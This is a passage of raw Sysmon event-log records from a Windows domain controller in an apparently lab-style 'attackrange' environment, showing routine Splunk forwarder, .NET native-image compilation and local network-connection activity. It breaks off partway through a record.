23542300x800000000000000019567Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:16.122{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6292CD3E46572BB53E0E0F76B0A17F75,SHA256=0D0FAF1AED6335A12C00FB4A94666C4A242DDD360AF643D1B81323A1BF26AA65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019568Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:17.138{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54B9BFCE6873803203C5F9C61E723963,SHA256=8C8C87783F3A7D683CEA8214B9CBF3D253FB49DFC49A1089AC13FF942572E2E4,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000019570Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:18.700{4DB9351A-A156-60D3-EE02-00000000CF01}7140C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1be4-0\System.dll2021-06-23 21:02:18.700 23542300x800000000000000019569Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:18.169{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3FED20933CC2DC9F88012B75A7E8270,SHA256=972E1CB643D98348F1A2FA2F92F7F9788E8C6F724405F5B7AEF56AF2FA49B0A1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019577Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:19.778{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A15B-60D3-F002-00000000CF01}7112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019576Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:19.763{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A15B-60D3-F002-00000000CF01}7112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019575Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:19.763{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A15B-60D3-F002-00000000CF01}7112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000019574Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:19.388{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A15B-60D3-EF02-00000000CF01}5536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019573Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:19.372{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A15B-60D3-EF02-00000000CF01}5536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019572Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:19.372{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A15B-60D3-EF02-00000000CF01}5536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000019571Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:19.184{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBE675E6BA3F272D8A893B537CBB0CA4,SHA256=0FBE96C5D9E38D8A36BB05B026CB712D27FC743016E85FBAFEC265F450AC5202,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000019581Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:19.113{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61382-false10.0.1.12-8000- 23542300x800000000000000019580Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:20.544{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ADA7FED7C269A8D32032602865D048C6,SHA256=3A9CE38E623DBBA5EB26790B2D47FE8EFFC509FF1888AA78C8F7C2186E65A3FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019579Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:20.544{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB616C3419877F2D76A9B2914C4F2C91,SHA256=A5538775588C54115314ACF9EC05CE1AAFFEF1737CB973914186DABF79A522E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019578Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:20.216{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA79D382C65AB5677E0882CB2351C397,SHA256=B5B81B55454AB48BD5AC5A4BA7939FF344460A69BAAD607F029705F89F90DE5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019582Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:21.216{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A6018C6AEE8398B820732ED7CEE6CC5,SHA256=5AEC56B21EB732715FBE6BCC60E845CC88CA3CA67EEC5F8DAF838E80EA688029,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019583Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:22.231{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F47051C41CB9C921DC85A7ADCE162B2D,SHA256=AAD048CF4D2F2A91F0A1B865FAED22E5F98377BB786C27406DB95565DE42086F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019593Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:23.638{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A15F-60D3-F202-00000000CF01}6644C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019592Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:23.622{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A15F-60D3-F202-00000000CF01}6644C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019591Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:23.622{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A15F-60D3-F202-00000000CF01}6644C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000019590Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:23.482{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A15F-60D3-F102-00000000CF01}5300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019589Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:23.466{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A15F-60D3-F102-00000000CF01}5300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019588Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:23.466{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A15F-60D3-F102-00000000CF01}5300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000019587Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:23.294{4DB9351A-A15B-60D3-F002-00000000CF01}7112NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\OHWPO8MW7V\System.Xml.ni.dll.auxMD5=E01ABDE7405B6917FD52CBCECEDFB15C,SHA256=73DEA8197F091277613BAAFEDBE37A4231410291B5AFABAC8D6907407482215B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019586Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:23.294{4DB9351A-A15B-60D3-F002-00000000CF01}7112NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\OHWPO8MW7V\System.Xml.ni.dllMD5=5F6EA5E77659D339DC666E0BCCD7B0FB,SHA256=D03C42DCD3565491379E0C0940E60507EB8B28F6FAC705F98D68A788AA31F8C8,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000019585Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:23.263{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8301A2152143618D4ACC33D0F98C5CD2,SHA256=42D476BD0104EAF9BDBFAF403BC518F93372EA81EE62E109419B43368B00D399,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000019584Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:23.138{4DB9351A-A15B-60D3-F002-00000000CF01}7112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1bc8-0\System.Xml.dll2021-06-23 21:02:23.138 23542300x800000000000000019595Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:24.481{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ADA7FED7C269A8D32032602865D048C6,SHA256=3A9CE38E623DBBA5EB26790B2D47FE8EFFC509FF1888AA78C8F7C2186E65A3FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019594Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:24.356{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=891569CAE99D069E2706443899B9A20A,SHA256=590CD36ED222B77746F5E5259DD09BD3E8D567BA9036650215BFAA380FFEF083,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019596Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:25.356{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D2756FDFDC7F85CE6F1F10C7D9F01AC,SHA256=C83E31B330A87AC7F53965E332A0EB8D24E796DAEA90068BB6222D5EF7EC80BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019599Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:26.387{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E578BAF443C970268471E42C55F58EA9,SHA256=B7B78CE45DAA5434679611338A4E6CCE643818C06A5C4B7CF70D35626F2DAC67,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000019598Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:25.113{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61383-false10.0.1.12-8000- 23542300x800000000000000019597Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:26.106{4DB9351A-9DDD-60D3-1200-00000000CF01}416NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=4262AA929BBC760C522631DE9230D194,SHA256=7F149A78B34A1321C438D4850019541B7FB8E6AA1C0F4AA8396AB167EECF5338,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019600Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:27.387{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBA905EB3AD1249A72A32D6E903E98A1,SHA256=1C3FB6733DCBEA7D236653CAB95032682D4754348383B52BFEF8EAB8423DD9F6,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000019602Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:28.934{4DB9351A-A15F-60D3-F202-00000000CF01}6644C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\19f4-0\System.Core.dll2021-06-23 21:02:28.934 23542300x800000000000000019601Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:28.403{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8E23D3F92E173956126BD2EBEB3391C,SHA256=F34D2B97BF7452FDEF33916E557F863BAA5291EA1D5BF105E781B328025F0A27,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019606Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:29.466{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A165-60D3-F302-00000000CF01}2244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019605Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 